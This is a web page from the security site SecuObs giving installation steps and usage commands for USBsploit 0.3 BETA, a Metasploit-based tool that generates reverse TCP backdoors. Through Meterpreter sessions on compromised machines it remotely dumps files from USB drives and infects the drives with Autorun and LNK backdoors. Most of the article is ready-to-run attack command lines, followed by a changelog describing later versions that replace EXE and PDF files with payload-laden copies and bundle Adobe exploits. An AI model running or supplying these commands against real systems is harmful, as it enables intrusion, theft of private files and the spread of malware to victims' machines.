Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- réseau


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Ping Identity rachète Accells pour renforcer le niveau de sécurité de l'authentification sur les mobiles
- Qnap met à jour ses systèmes pour fixer la faille de sécurité OpenSSL Heartbleed
- Pure Storage lève 225 millions de dollars, portant sa valorisation à plus de 3 milliards de dollars avec le concours de grands investisseurs
- Vigilance - Windows exécution de code via BAT CMD, analysé le 08 04 2014
- Operation Francophoned The Persistence and Evolution of a Dual-Pronged Social Engineering Attack
- Phishers Pump out Heartbleed Attacks
- Vigilance - Noyau Linux déni de service via cma_req_handler, analysé le 08 04 2014
- Vigilance - WebSphere MQ multiples vulnérabilités, analysé le 08 04 2014
- Atelier photo La photo vue du labo
- Vigilance - SAP Router obtention de mot de passe via Brute Force, analysé le 08 04 2014
- Xooloo équipe les abonnés de Crédit Mutuel Mobile, CIC Mobile et NRJ Mobile avec sa solution de contrôle parental pour mobiles et tablettes
- Schneider Electric choisit InterCloud pour l'accompagner dans la migration de ses applications vers le cloud
- Morpho participe à un test de la Commission européenne relatif à la lutte contre le terrorisme
- Boîtes mail dites OUI à l'organisation des contenus et au chaos grâce à ccgenie
- CLUSIF nouveau groupe de travail pour la Gestion et la Gouvernance des Identités et des Accès

Dernier articles de SecuObs :
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles
- #LPM2013: Un nouvel espoir ?
- L'ANSSI durcit le ton
- Assises 2013: Nouvel élan de jeunesse
- OWASP Framework Security Project, répertorier et fixer les contrôles de sécurité manquants
- Le bracelet Nimy, une solution d'authentification à 3 facteurs utilisant un capteur d'ECG

Revue de presse internationale :
- Daily Blog 304 How to use the Triforce Videos
- Windows Azure Virtual IP Address
- Goodins Theatre of the Absurd
- Security Slice The Heartbleed Headache Continues
- Many Still Uncertain About Heartbleed s Impact on Their Organization
- Episode 267 - PowerScripting Podcast - Alan Renouf from VMware on PowerCLI
- Fun with Passphrases , Thu, Apr 24th
- All at sea global shipping fleet exposed to hacking threat
- NYPD's Twitter Campaign Backfires
- Be Careful what you Scan for , Thu, Apr 24th
- ISC StormCast for Thursday, April 24th 2014 http isc.sans.edu podcastdetail.html id 3949, Thu, Apr 24th
- EEVblog 607 Agilent B2912A Source Measure Unit SMU Teardown
- ASK AN ENGINEER LIVE electronics video show 4 23 14 video
- Netcraft releases Heartbleed indicator for Chrome, Firefox, and Opera
- Heartbleed Aftershock The New Certificate Threat

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- [IDS Snort Windows – Partie 2] Installation et configuration
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- #FIC2014: Entrée en territoire inconnu
- [IDS Snort Windows – Partie 4] Conclusion et webographie
- [IDS Snort Windows – Partie 3] Exemple de fichier de configuration
- Powerpreter, un nouveau module Powershell de post-exploitation pour Nishang 0.3
- [Trames et paquets de données avec Scapy – Partie 5] Traceroute et visualisation 2D/3D
- Le ministère de l'intérieur censure une conférence au Canada
- USBDumper 2 nouvelle version nouvelles fonctions !
- OSSTMM une méthodologie Open Source pour les audits de sécurité

Top bi-hebdo de la revue de presse
- Using masscan to scan for heartbleed vulnerability
- Introducing the rsyslog config builder tool
- INSIDE Secure acquiert Metaforic
- 1,103 Megaupload Servers Gather Dust at Virginia Warehouse
- RS485 Arduino Network showandtell adafruit6secs
- Move Active Directory users to a group with PowerShell
- Implementing SCADA Protocols Simulating IEC104
- Windows Zero-Day Vulnerability Researched by Microsoft
- toolsmith EMET 4.0 These Aren t the Exploits You re Looking For
- L ANSSI s attèle aux décrets d application de la LPM portant sur la protection des opérateurs d importance vitale

Top bi-hebdo de l'annuaire des videos
- Tutorial 14 Pfsense OpenVpn RoadWarrior VPN
- Backtrack 5r3 Armitage Metasploit
- Tutorial 15 pfSense Squid Squidguard Content filtering
- Comment Pirater Un Ordinateur Avec Ubuntu Metasploit
- Hak5 1408 1 Reviewing Kali Linux and USB Rubber Ducky Payload Generator
- Comment creer un server botnet!!!!(Réseau de pc zombies)
- Tutoriel Supprimer Cacaoweb Botnet
- Bbkeyswin WPA d une Bbox en 2 min sous Windows
- Avoir des donuts illimit s sur le jeu Simpsons Springfield
- crypt server njrat darkcomet bifrost xtremrat spynet zeus botnet

Top bi-hebdo de la revue Twitter
- Zombies are attacking America – researchers: Banking sector DDoSers 'used botnets', say security boffins. Hackers re…
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- #networksecurity #cloud Expert QA: Cloud computing, HIE will be the 'new normal' - Ken Ong: The National Institute ...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- [Blog Spam] Metasploit and PowerShell payloads
- Zombies are attacking America – researchers - Banking sector DDoSers 'used botnets', say security boffins Hackers re...
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- An inexpensive proxy service called is actually a front for #malware distribution -
- RT @helpnetsecurity: Proxy service users download malware, unknowingly join botnet //How ironic.

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

USBsploit

English version with Google Translate

How to install USBsploit 0.3 BETA through SVN, the tar.gz, the .run or to work with the original Metasploit

Par Xavier Poli, secuobs.com
Le 12/10/2010


Résumé : PoC to generate Reverse TCP backdoors, running Autorun or LNK USB infections, but also dumping all USB files remotely on multiple targets at the same time. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET (The Social Engineering Toolkit). The Meterpreter script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework. - Lire l'article



The most recent version of USBsploit is actually the 0.6 BETA

Reports the bugs to https://twitter.com/secuobs or xavier.poli@infratech.fr (recommanded for privacy issues), KeyID: 0x3A3D555A, FingerPrint: 04B1 244C CC25 DA93 EB73 EF52 E278 881F 3A3D 555A, xpo.asc

The usbsploit.rb script seems to have some issues if used with the default Ruby version of Backtrack 4, installing a 1.9.1 version will fixed. The details to give in the bugs reports: the version of Python, the version of Ruby, the version of Metasploit if used, the OS of the targets, the OS of the listener, the hardware details for both the targets and the listener but also for the USB drives, the security solutions installed on both the targets and the listener, the particular firewall configuration on both the target and the listener, the version of VMware or others if used, the last file for the Dump configuration, the stage where the bug was identified, the global USBsploit options if changed, the output of the high verbosity scan, the output of USBsploit

To use USBsploit, you certainly need the same dependencies ( link ) as the Metasploit Framework and SET.

Installation 0.3 BETA through SVN ( lien )

root:~# svn -q co https://svn.secuobs.com/svn
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT
- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p
root:~# cd svn/
root:~/svn# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root:~/svn# cd ../
root:~# rm -fr svn
root:~# usbsploit


Installation through usbsploit-0.3-BETA-linux-i686.run ( lien )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.3-BETA-linux-i686.run
root:~# sha1sum usbsploit-0.3-BETA-linux-i686.run
2a85b5771e457e3f93f1f4fc103d6e6642b21e41 usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# sh usbsploit-0.3-BETA-linux-i686.run
Type usbsploit to launch the USBsploit Framework
root:~# rm -fr usbsploit
root:~# usbsploit
The USBsploit Framework 0.3 BETA
Report bugs to: xavier.poli.fr
Or: http://www.twitter.com/secuobs
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)

It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT

- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p


Installation through usbsploit-0.3-BETA-linux-i686.tar.gz ( lien )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# sha1sum usbsploit-0.3-BETA-linux-i686.tar.gz
2c4761fe51bc19dbbce4ee3f4c1e0b0b2048b222 usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# tar zxvf usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# cd usbsploit
root:~/usbsploit# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root:~/usbsploit# cd ../
root:~# rm -fr usbsploit/
root:~# usbsploit
The USBsploit Framework 0.3 BETA
Report bugs to: xavier.poli.fr
Or: http://www.twitter.com/secuobs
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)

It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT
- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p


Installation usbsploit.rb 0.3 BETA working with the original Metasploit Framework ( lien )

root:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# sha1sum usbsploit-0.3-BETA-linux-i686.tar.gz
2c4761fe51bc19dbbce4ee3f4c1e0b0b2048b222 usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# tar zxvf usbsploit-0.3-BETA-linux-i686.tar.gz
root:~# mv usbsploit/lib/msf/scripts/meterpreter/usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root:~# mv usbsploit/lib/msf/data/textextensions /opt/metasploit3/msf3/data/
root:~# rm -fr usbsploit/
root:~# msfconsole -n

When you have a Meterpreter session:

- Get some help

meterpreter > run usbsploit -h

- Launch a Dump attack on all files with high verbosity and only during one successfull scan with dumped files

meterpreter > run usbsploit -v -w -d

- Launch a Dump attack only on files matching the predefined set of extensions with high verbosity and only during one successfull scan with dumped files

meterpreter > run usbsploit -v -w -e /opt/metasploit3/msf3/data/textextensions -t

- Launch a Dump attack on all files with high verbosity during an infinite loop

meterpreter > run usbsploit -v -d

- Launch a Dump attack only on files matching the predefined set of extensions with high verbosity during an infinite loop

meterpreter > run usbsploit -v -e /opt/metasploit3/msf3/data/textextensions -t

- Launch an Autorun infection attack with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a

- Launch both Autorun infection and all files dumping attacks with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -d

- Launch both Autorun infection and files dumping attacks (only on files matching the predefined set of extensions) with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -e /opt/metasploit3/msf3/data/textextensions -t

- Launch an Autorun infection attack with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a

- Launch both Autorun infection and all file dumping attacks with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -d

- Launch both Autorun infection and file dumping (only on files matching the predefined set of extensions) attacks with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -n usbsploitbackdoor.exe -b /opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe -j /opt/usbsploit/lib/msf/data/autorun.ico -a -e /opt/metasploit3/msf3/data/textextensions -t

- Launch an LNK infection attack with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l

- Launch both LNK infection and all files dumping attacks with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l -d

- Launch both LNK infection and files dumping attacks (only on files matching the predefined set of extensions) with high verbosity and only during one successfull scan

meterpreter > run usbsploit -v -w -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l -e /opt/metasploit3/msf3/data/textextensions -t

- Launch an LNK infection attack with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l

- Launch both LNK infection and all file dumping attacks with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l -d

- Launch both LNK infection and file dumping (only on files matching the predefined set of extensions) attacks with high verbosity during an infinite loop

meterpreter > run usbsploit -v -i /opt/usbsploit/lib/msf/data/autorun.inf -j /opt/usbsploit/lib/msf/data/autorun.ico -m usbsploit.lnk -k /opt/usbsploit/lib/msf/data/usbsploit.lnk -l -e /opt/metasploit3/msf3/data/textextensions -t

Just removed the "-v" switch to desactivate the high verbosity

USBsploit ressources:

- Video - USBsploit 0.6 BETA: Replace and infect all EXE and PDF with payload embedded into the orignal files
- Video - USBsploit 0.6 BETA: using autosploit CLI to automate the infection of all original EXE & PDF files
- Video - usbsploit.rb 0.6b w/ MSF: custom infection to replace all the original EXE and PDF files
- Video - usbsploit.rb 0.6b split into 3 scripts w/ MSF: custom infection to replace all original EXE and PDF
- How to install USBsploit 0.6 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- Video - USBsploit 0.5 BETA: Dump, Autorun, Migration and all EXE, PDF, LNK files replaced through Railgun against XP HOME
- Video - USBsploit 0.5 BETA: Dump, Autorun, Migration and all EXE files replaced, Railgunonly option against XP PRO
- Video - usbsploit.rb 0.5b with Metasploit: Dump, Autorun, Migration and all EXE, PDF, LNK files replaced using Railgun against XP HOME
- Video - usbsploit.rb 0.5b split into 3 scripts with Metasploit: Migration, Replacement, dump protection and Railgunonly against XP PRO
- How to install USBsploit 0.5 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- Video: USBsploit 0.4 BETA: Auto[run|play]/PDF USB infection and files dumping through Meterpreter sessions
- Video: usbsploit.rb 0.4 in Metasploit, Auto[run|play]/PDF USB infection and files durmping through Meterpreter
- How to install USBsploit v0.4b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit 0.3 BETA: Auto[run|play]/LNK USB infection and files dumping through Meterpreter sessions
- Video: usbsploit.rb 0.3 in Metasploit, Auto[run|play]/LNK USB infection and files durmping through Meterpreter
- How to install USBsploit v0.3b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit 0.2 BETA: Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: usbsploit.rb 0.2 and the original Metasploit Framework,Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: USBsploit 0.2 BETA: both USB files dumping and Auto[run|play]/EXE USB infection through Meterpreter sessions
- Video: usbsploit.rb 0.2 in Metasploit, both Auto[run|play]/EXE USB infection and files durmping through Meterpreter sessions
- How to install USBsploit v0.2b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework
- Video: USBsploit gets all the remote USB files through Meterpreter sessions and a modified version of the original Metasploit Framework
- Video: USBsploit gets all the remote USB files filtered by extensions through Meterpreter sessions and a modified version of the original Metasploit Framework
- Video: usbsploit.rb and the original MSF to get all the remote USB files through Meterpreter sessions
- Video: usbploit.rb and the original MSF to get all the remote USB files filtered by extensions through Meterpreter sessions
- How to install USBsploit v0.1b through SVN, the tar.gz, the .run or to work with the original Metasploit Framework

Changelog:

USBsploit V0.6b:

- Add an option for the replacement module, allowing to try to upload an infected version of the original USB files first. Only for PDF and EXE files, LNK ones will always be replaced by a generic malicious one. If not succeeding to infect an embed custom version, a generic malicious one will be used to replace the EXE and PDF files. It can be use alone or with any Auto[run|play] infection but not with a single dump (all or by extension) attack. It's useful when the targets don't have Auto[run|play] activated. Can be used with USBsploit or with the original Metasploit framework via the usbsploit.rb script provided. Also supported into the 3 splited meterpreter scripts (autorun_usbsploit.rb, dump_usbsploit.rb, replace_usbsploit.rb).
- Offer a CLI to automate the creation of the malicious files and the launch of the listeners. The ip, payload, encoder, count, port, attacks, replacing, template for pdf embed and pdf type options can be specified via specific switchs on the command line. If nothing specified for an option, the default value will be used. All the different combinaisons were tested via an intenal fuzzing tools and looks to work.
- offers an internal Metasploit core updated with the last SVN version (metasploit v3.7.0-dev svn r12145 2011.03.26).

USBsploit V0.5b:

- integrates a EXE, PDF and LNK USB replacement module. It can be use alone or with any Auto[run|play] infection but not a single dump (all or by extension) attack. It's useful when the targets don't have Auto[run|play] activated.
- offers an option to use to replace only the contextual files to an Auto[run|play] USB infection. If Auto[run|play]/exe, all the EXE can be replaced, same for Auto[run|play]/pdf PDF files and Auto[run|play]/lnk LNK files.
- now using railgun with with GetLogicalDrives(), GetDriveTypeN() and GetVolumeInformationW() when vmic's not available on the targets (XP HOME).
- an option can be activated to always using railgun with with GetLogicalDrives(), GetDriveTypeN() and GetVolumeInformationW(), even when vmic's available on the targets (XP PRO).
- More than the single usbsploit.rb scripts, now offering 3 independent ruby meterpreter scripts (autorun_usbsploit.rb, dump_usbsploit.rb, replace_usbsploit.rb). Note that dump_usbsploit.rb's an option to protect the dumped files from being overwritten when trying to dump a file previously uploaded by replace_usbsploit.rb or autorun_usbsploit.rb. Every scripts can be used with the last original Metasploit Framework (all the options work with the 3.5.1-dev).
- offers an internal Metasploit core updated with the last SVN version (v3.5.1-dev svn r11223 2010.12.04).
- Add Adobe FlateDecode Stream Predictor 02 Integer Overflow to the list of MSF FileFormat attacks.
- Minor improvements and some bug fixes like when a non default value's specified for the path of the file listing the extension to dump.

USBsploit V0.4b:

- integrates a Auto[run|play]/PDF USB infection module with various attacks (Adobe CoolType SING Table 'uniqueName' Overflow, Adobe Flash Player 'newfunction' Invalid Pointer Use, Adobe Collab.collectEmailInfo Buffer Overflow, Adobe Collab.getIcon Buffer Overflow, Adobe JBIG2Decode Memory Corruption Exploit, Adobe PDF Embedded EXE Social Engineering, Adobe util.printf() Buffer Overflow, Adobe U3D CLODProgressiveMeshDeclaration Array Overrun, Adobe PDF Embedded EXE Social Engineering (NOJS)).
- offers an option to use both the Auto[run|play]/PDF USB infection and the USB files dumping attack on a same target
- offers a ruby meterpreter script (usbsploit.rb) compatible with the last original Metasploit Framework (all the options work with the 3.5.1-dev). A bug (reported to the MSF team) seems to exist with this last version of MSF (not with the previous 3.4.2-dev) when exit -y is used if you have an active session and an InitialAutorunScript was used (finished or not), you need to kill it with sessions -K before exit or exit -y. The USBsploit Framework is always based on the 3.4.2-dev for the moment to avoid this issue.

USBsploit V0.3b:

- was tested under a GNU/Linux operating system with Python 2.6.5 and ruby 1.9.1,
- integrates a Auto[run|play]/LNK USB infection module. The generation of the LNK file, the autorun.inf and the rest of the process are splitted but share some random values to work together
- offers to launch a LNK listener (different from the one handling the USB infection) to get the connect back from the USB drives infected with the last LNK file generated.
- offers also a full console with this listener, including all the Metasploit features, except the exploits, payloads, encoders and nops. You have to add manually this kind of stuffs if you want to use it (copy from a classic Metasploit installation to the lib/msf/modules in the USBsploit installation tree). You can choose to activate the database support or not on this console.
- offers an internal Metasploit core updated with the last SVN version (v3.4.2-dev)
- adds support for the French outputs of the wmic commands
- offers an option to use both the Auto[run|play]/LNK USB infection and the USB files dumping attack on a same target
- offers a ruby meterpreter script (usbsploit.rb) compatible with the last original Metasploit Framework (all the options work with the 3.4.2-dev).

USBsploit V0.2b:

- integrates the Auto[run|play]/EXE USB infection module
- offers an option to use both the Auto[run|play]/EXE infection and files dumping attack on a same target

USBsploit V0.1b:

- was tested under a GNU/Linux operating system with Python 2.6.2 and ruby 1.9.1,
- was tested against a target Microsoft Windows XP PRO SP3 running under a GNU/Linux VMware Server 2.0.2,
- needs the wmic command on the targets (Windows XP home is not a possible target),
- works against multiple targets at the same time and multiple USB keys on each target
- deals the multiple plugs and unplugs for a same key
- can be installed via SVN, ".run" or ".tar.gz" archives,
- can be managed through a Python interface (a modified version of the Social Engineering Toolkit, original by ReL1K),
- can be updated via SVN,
- allows the activation and the desactivation for auto-updates,
- allows to edit global configuration file,
- allows to generate Meterpreter Backdoors with some available options (ip for the listener, type of Backdoor, type of Encoding, port for the Listener, multiple Encoding stages) and choose if a Dump Listener will be launched,
- allows to generate Meterpreter Backdoors with the same kind of options and launching automatically a Dump Listener,
- lets choosing between 3 types of Meterpreter Backdoors available (Reverse_TCP the only one tested for now, Reverse_TCP_X64, Egress Buster),
- lets choosing between 3 types of Encoding for the Meterpreter Backdoors (shikata_ga_nai, Multi-Encoder, Backdoored EGxecutable),
- allows to dump all the files from a remote USB key through multiple Meterpreter sessions and a light version (24MB) of Metasploit (original by HDM),
- allows to dumps, from a remote USB key, all the files matching a specific set of extensions, defined through a text file,
- allows to edit the file for defining the set of extensions,
- allows to launch a Dump Listerner through the last file of Dump configuration,
- allows to edit the last file of Dump configuration,
- allows to activate the high verbose mode,
- allows to choose between only one USB Scan/Dump ending with success for each attack or an infinite loop,
- Ruby script usbsploit.rb compatible with the original Metasploit Framework (all the options work with the version 3.4.x, the anterior versions weren't tested).

The future versions of USBsploit could:

- inject a malicious VBS script into the DOC/XLS files available on the remote USB keys
- target USB U3 keys,
- integrate the ReverseConnectRetries directive for the Reverse_TCP payloads
- integrate the EnableContextEncoding and ContextInformationFile directives for the generation of payloads
- reintegrate some features of SET to spread the malicious files,
- help to build a fake malicious website alimenting a Twitter account with the items from the most popular Press RSS. Karmetasploit, Wepbuster, MITM and ARP poisonning modules could also be added
- Others ???


Les mots clés pour les articles publiés sur SecuObs : usbsploit targz metasploit
Les articles de la revue de presse sur les mots clés : metasploit
Les videos sur SecuObs pour les mots clés : usbsploit metasploit
Les éléments de la revue Twitter pour les mots clés : metasploit
Voir tous les articles de "Xavier Poli" publiés sur SecuObs (350 résultats)
Voir tous les articles publiés par l'organisme "secuobs" sur SecuObs (997 résultats)


- Article suivant : La gestion des accès et des identités, un des chantiers les plus importants de la sécurité informatique en entreprise
- Article précédent : Video: usbsploit.rb 0.3b with Metasploit, USB LNK infection through Meterpreter and files dumping
- Article suivant dans la catégorie USBsploit : Video - USBsploit 0.4 BETA: USB Auto[run|play]/PDF Infection through Meterpreter, reverse backdoor and files dumping
- Article précédent dans la catégorie USBsploit : Video: usbsploit.rb 0.3b with Metasploit, USB LNK infection through Meterpreter and files dumping



Les derniers articles de la catégorie USBsploit :
- usbsploit_module.rb 0.1: use USBsploit as a module for Metasploit
- usbsploit.rb 0.6b split into 3 scripts w/ MSF: custom infection to replace all original EXE and PDF
- usbsploit.rb 0.6b w/ MSF: custom infection to replace all the original EXE and PDF files
- USBsploit 0.6 BETA: using autosploit CLI to automate the infection of all original EXE & PDF files
- USBsploit 0.6 BETA: Replace and infect all EXE and PDF with payload embedded into the original files
- How to install USBsploit 0.6 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- How to install USBsploit 0.5 BETA through SVN, the tar.gz, the .run or to work with original Metasploit
- Video - usbsploit.rb 0.5b split into 3 scripts with Metasploit: Migration, Replacement, dump protection and Railgunonly against XP PRO
- Video - usbsploit.rb 0.5b with Metasploit: Dump, Autorun, Migration and all EXE, PDF, LNK files replaced using Railgun against XP HOME
- Video - USBsploit 0.5 BETA: Dump, Autorun, Migration and all EXE files replaced, Railgunonly option against XP PRO




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :